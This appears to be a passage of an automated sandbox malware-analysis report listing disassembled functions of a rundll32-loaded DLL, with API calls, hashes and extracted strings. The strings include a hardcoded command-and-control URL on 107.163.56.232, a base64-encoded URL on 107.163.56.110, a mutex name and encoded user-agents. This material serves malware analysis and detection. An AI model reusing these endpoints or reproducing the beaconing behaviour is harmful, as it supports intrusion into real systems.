                                                                                                                                                                          • Opcode Fuzzy Hash: a1878e512939dc9aed6c6a2808bc6b3174a4810047bc271b34a995d0e4e84be8
                                                                                                                                                                          • Instruction Fuzzy Hash: 0D21A17680021CBAEB11DBE48C85EDFBB7DEF08390F140466F604B6141EA756A858BA1
                                                                                                                                                                          Function 100062F3 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 162stringCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.3206084794.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206171992.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206325037.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206361315.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206463224.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206509029.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206545463.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206576498.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206614724.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206649187.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206729654.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206769279.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: strcspn$FormatTime___crt
                                                                                                                                                                          • String ID: http://
                                                                                                                                                                          • API String ID: 4006067733-1121587658
                                                                                                                                                                          • Opcode ID: a0416022ebacc6e770f8a5490d80555b2289548172b231cb014c820514a50a33
                                                                                                                                                                          • Instruction ID: 5e5274a5df46717633dbefa534eebea5f36de8a9ab4d0e8209e5c86ee6f0ed2e
                                                                                                                                                                          • Opcode Fuzzy Hash: a0416022ebacc6e770f8a5490d80555b2289548172b231cb014c820514a50a33
                                                                                                                                                                          • Instruction Fuzzy Hash: 6541457690421CBAEF11DBB4DC85FDE77BCDF08394F5004A6F608E6082DA75AF458AA1
                                                                                                                                                                          Function 10006A91 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 65sleepthreadCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 10003ECE: CreateMutexA.KERNEL32(?,?,?,10006AC6,00000000,00000000,0x5d65r455f,?,00000202,?), ref: 10003EDA
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 10006ACB
                                                                                                                                                                            • Part of subcall function 100064AB: wsprintfA.USER32 ref: 10006509
                                                                                                                                                                            • Part of subcall function 100064AB: ___crtGetTimeFormatEx.LIBCMT ref: 10006558
                                                                                                                                                                          • Sleep.KERNEL32(0002BF20), ref: 10006B00
                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_00006890,00000000,00000000,00000000), ref: 10006B14
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.3206084794.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206171992.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206325037.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206361315.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206463224.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206509029.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206545463.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206576498.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206614724.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206649187.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206729654.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206769279.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Create$ErrorFormatLastMutexSleepThreadTime___crtwsprintf
                                                                                                                                                                          • String ID: 0x5d65r455f$5762479093
                                                                                                                                                                          • API String ID: 3244495550-2446933972
                                                                                                                                                                          • Opcode ID: 2b6b27ac91e41062734f3373b3ae15d3a14cdbb1e032772f862c600bebe40acc
                                                                                                                                                                          • Instruction ID: 4f67e99d50a46098441a250a8f858ff8eaba0e926cf0b864be99c43c72b3ca27
                                                                                                                                                                          • Opcode Fuzzy Hash: 2b6b27ac91e41062734f3373b3ae15d3a14cdbb1e032772f862c600bebe40acc
                                                                                                                                                                          • Instruction Fuzzy Hash: F7014CB69443587AF210E3716CC6DFB3A4CDF953E0F240535FA15950CBDA24AC1581B2
                                                                                                                                                                          Function 100087D6 Relevance: 7.5, APIs: 5, Instructions: 29sleepthreadCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • Sleep.KERNEL32(000927C0), ref: 100087E8
                                                                                                                                                                          • CreateThread.KERNEL32(?,?,Function_00006A91), ref: 100087F4
                                                                                                                                                                          • Sleep.KERNEL32(00001388,?,?,Function_00006A91), ref: 100087FB
                                                                                                                                                                          • CreateThread.KERNEL32(?,?,1000843F,?,?,?,?,?,Function_00006A91), ref: 10008807
                                                                                                                                                                          • Sleep.KERNEL32(000000FF), ref: 1000880B
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.3206084794.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206171992.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206325037.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206361315.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206463224.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206509029.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206545463.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206576498.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206614724.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206649187.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206729654.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206769279.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Sleep$CreateThread
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3220764680-0
                                                                                                                                                                          • Opcode ID: 538c09f4ca1db9a5df36fbaa0c689abd638c4e70f4fcd7ac301f6431ffc0d22a
                                                                                                                                                                          • Instruction ID: 4b6e769774edf3c018003931c063b816a823b7adbda171aad520a6a641979407
                                                                                                                                                                          • Opcode Fuzzy Hash: 538c09f4ca1db9a5df36fbaa0c689abd638c4e70f4fcd7ac301f6431ffc0d22a
                                                                                                                                                                          • Instruction Fuzzy Hash: F3E017E824435E38B120B3B60CC6CAB1D4CEF806EC3624610F6645108ADE419E089EB1
                                                                                                                                                                          Function 100044BF Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 85COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 494 100044bf-100044dd call 10036273 497 10004531 494->497 498 100044df-100044ff call 10033438 GetExtendedUdpTable 494->498 499 10004532 497->499 500 1000455d-1000456d call 10035b16 call 1002f04c 497->500 507 10004501-10004504 498->507 508 10004506-10004514 call 100380ec 498->508 499->500 503 10004534 499->503 514 10004571-10004575 500->514 506 10004537-10004547 call 10028241 503->506 518 10004553-1000455a 506->518 519 10004549-1000454f 506->519 507->508 509 10004516-10004519 507->509 508->509 517 1000451b-1000452a GetExtendedUdpTable 508->517 509->514 520 10004530 517->520 521 1000452c-1000452e 517->521 518->500 519->506 522 10004551 519->522 520->497 521->514 522->500
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetExtendedUdpTable.IPHLPAPI(00000000,100152B0,00000001,00000002,00000001,00000000,00000000,00000000,iphlpapi.dll,00000000,cmd.exe,00000000), ref: 100044FB
                                                                                                                                                                          • GetExtendedUdpTable.IPHLPAPI(00000000,100152B0,00000001,00000002,00000001,00000000), ref: 10004525
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.3206084794.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206171992.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206325037.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206361315.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206463224.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206509029.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206545463.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206576498.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206614724.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206649187.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206729654.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206769279.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExtendedTable
                                                                                                                                                                          • String ID: cmd.exe$iphlpapi.dll
                                                                                                                                                                          • API String ID: 2407854163-236925365
                                                                                                                                                                          • Opcode ID: e2e9211ea7ade89dc831a8659b89218d2b5f251a8e2d1a35f8a9eda1d3166796
                                                                                                                                                                          • Instruction ID: 365beb789b99603e116b1a1ab9323ed5eb6d4335065ecc84b7a338da563c50e8
                                                                                                                                                                          • Opcode Fuzzy Hash: e2e9211ea7ade89dc831a8659b89218d2b5f251a8e2d1a35f8a9eda1d3166796
                                                                                                                                                                          • Instruction Fuzzy Hash: 162104B5D00A04BFEB11DBA89C81DBF77BCEB416D2F218956F451E6186EB30AE408664
                                                                                                                                                                          Function 100062A2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38timeCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 523 100062a2-100062c2 call 10001000 call 10003f0a 528 100062c4-100062d1 call 10003f24 523->528 529 100062ee-100062f2 523->529 531 100062d6-100062db 528->531 532 100062e0 531->532 533 100062dd-100062de 531->533 534 100062e1-100062ed call 10003f58 * 2 532->534 533->534 534->529
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 10003F0A: InternetOpenA.WININET(7A4A585A,30564758,6C773159,6A567959,754D574A), ref: 10003F1C
                                                                                                                                                                          • ___crtGetTimeFormatEx.LIBCMT ref: 100062D1
                                                                                                                                                                            • Part of subcall function 10003F24: InternetOpenUrlA.WININET(326C6D63,7A4A585A,30564758,6C773159,6A567959,754D574A), ref: 10003F39
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.3206084794.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206171992.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206325037.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206361315.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206463224.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206509029.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206545463.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206576498.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206614724.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206649187.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206729654.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206769279.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InternetOpen$FormatTime___crt
                                                                                                                                                                          • String ID: ECF4BB45F69F$TW96aWxsYS80LjAgKGNvbXBhdGlibGUp
                                                                                                                                                                          • API String ID: 1165476586-1862099156
                                                                                                                                                                          • Opcode ID: 506d6c5dc250ecec721ffc41dc4442ad077fce6a6201d60bf6a5e6fc8829cee9
                                                                                                                                                                          • Instruction ID: 21a2c1fa93f4fb8ce2e578520bcd28e6c7ec5b0984b492723eef9b5496b4b71f
                                                                                                                                                                          • Opcode Fuzzy Hash: 506d6c5dc250ecec721ffc41dc4442ad077fce6a6201d60bf6a5e6fc8829cee9
                                                                                                                                                                          • Instruction Fuzzy Hash: B6E0D832C089D2357A33E1671C0FD9F0EBDCBC7AE0B31403DF948A100DE856A49280B9
                                                                                                                                                                          Function 10007124 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 95sleepCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 539 10007124-1000713c call 1000ccc0 542 1000713e-10007183 call 10005c5e 539->542 545 10007185-1000718c 542->545 546 1000718e 542->546 547 10007193-100071c7 call 10003ef4 call 1000cd0e call 100061cf 545->547 546->547 554 100071c9-100071d5 Sleep 547->554 555 100071da-100071de 547->555 554->542 556 100071e0-100071ea 555->556 557 100071fc-10007206 call 1000cd14 555->557 559 100071f2 556->559 560 100071ec-100071f0 556->560 557->554 563 10007208-10007218 call 1000ce02 557->563 562 100071f6-100071fa 559->562 560->562 562->556 562->557 563->554 566 1000721a-1000722f wsprintfA call 10005721 563->566 566->554
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          • http://107.163.56.232:18963/main.php, xrefs: 1000718E
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.3206084794.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206171992.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206325037.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206361315.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206463224.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206509029.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206545463.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206576498.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206614724.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206649187.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206729654.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206769279.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Sleepwsprintf
                                                                                                                                                                          • String ID: http://107.163.56.232:18963/main.php
                                                                                                                                                                          • API String ID: 1749205058-3919619334
                                                                                                                                                                          • Opcode ID: b7b88872c4f2ca77bada5b5a446887ac554d5b21e502500d927af6b32f2ca290
                                                                                                                                                                          • Instruction ID: df85a5c81aedc657149ca01c126d313bee586dbed1d4d3978c6c3ca2ac76a151
                                                                                                                                                                          • Opcode Fuzzy Hash: b7b88872c4f2ca77bada5b5a446887ac554d5b21e502500d927af6b32f2ca290
                                                                                                                                                                          • Instruction Fuzzy Hash: B72129B69046567AF710D368CC56FCF369CFF053D0F3000B5F208A50C6EAB9AA804A65
                                                                                                                                                                          Function 10006B42 Relevance: 4.5, APIs: 3, Instructions: 45sleepthreadCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 10003ECE: CreateMutexA.KERNEL32(?,?,?,10006AC6,00000000,00000000,0x5d65r455f,?,00000202,?), ref: 10003EDA
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 10006B78
                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_00006890,?,00000000,00000000), ref: 10006B8E
                                                                                                                                                                          • Sleep.KERNEL32(00002710,00000000,00000000,00000000,000000FF), ref: 10006BAB
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.3206084794.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206171992.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206325037.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206361315.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206463224.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206509029.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206545463.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206576498.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206614724.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206649187.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206729654.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206769279.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Create$ErrorLastMutexSleepThread
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 145085098-0
                                                                                                                                                                          • Opcode ID: 6e86dcc16388275b23f5b89f6ec8f8bc150e4405bd4196b84570cd7b60874dbc
                                                                                                                                                                          • Instruction ID: 9023b97c409da10c3b84e885d2ccb2b6484bf3cfa7db22153589a8a7711359b9
                                                                                                                                                                          • Opcode Fuzzy Hash: 6e86dcc16388275b23f5b89f6ec8f8bc150e4405bd4196b84570cd7b60874dbc
                                                                                                                                                                          • Instruction Fuzzy Hash: 50F09674405264BAE611E7619C8ADFF3E6DDF8A7E4F100124F918A61C6CB64AE4282F6
                                                                                                                                                                          Function 10008589 Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 32sleepCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          • aHR0cDovLzEwNy4xNjMuNTYuMTEwOjE4NTMwL3UxMTI5Lmh0bWw=, xrefs: 100085A3
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.3206084794.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206171992.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206325037.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206361315.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206463224.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206509029.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206545463.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206576498.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206614724.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206649187.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206729654.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206769279.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Sleep$wsprintf
                                                                                                                                                                          • String ID: aHR0cDovLzEwNy4xNjMuNTYuMTEwOjE4NTMwL3UxMTI5Lmh0bWw=
                                                                                                                                                                          • API String ID: 3195947292-1577701794
                                                                                                                                                                          • Opcode ID: 9e786f786539636db66fb15e8139c8f1a863743c9ac7a57a5e3026de646030b2
                                                                                                                                                                          • Instruction ID: 4a5d728e07750d64c5f5934a383ecd53961408c042992e3cc8f838b67af43ebd
                                                                                                                                                                          • Opcode Fuzzy Hash: 9e786f786539636db66fb15e8139c8f1a863743c9ac7a57a5e3026de646030b2
                                                                                                                                                                          • Instruction Fuzzy Hash: 27F0A035C0111CBAFB21ABF58C8AEDF7E69EF043E0F140065F90462144DAB11E8087A1
                                                                                                                                                                          Function 100061CF Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 83timeCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 10003F0A: InternetOpenA.WININET(7A4A585A,30564758,6C773159,6A567959,754D574A), ref: 10003F1C
                                                                                                                                                                          • ___crtGetTimeFormatEx.LIBCMT ref: 10006213
                                                                                                                                                                          Strings
                                                                                                                                                                          • TW96aWxsYS81LjAgKFdpbmRvd3M7IFU7IFdpbmRvd3MgTlQgNi4xOyB6aC1DTjsgcnY6MS45LjIuMTUpIEdlY2tvLzIwMTEwMzAzIEZpcmVmb3gvMy42LjE1, xrefs: 100061E2
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.3206084794.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206171992.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206325037.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206361315.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206463224.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206509029.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206545463.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206576498.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206614724.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206649187.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206729654.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206769279.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FormatInternetOpenTime___crt
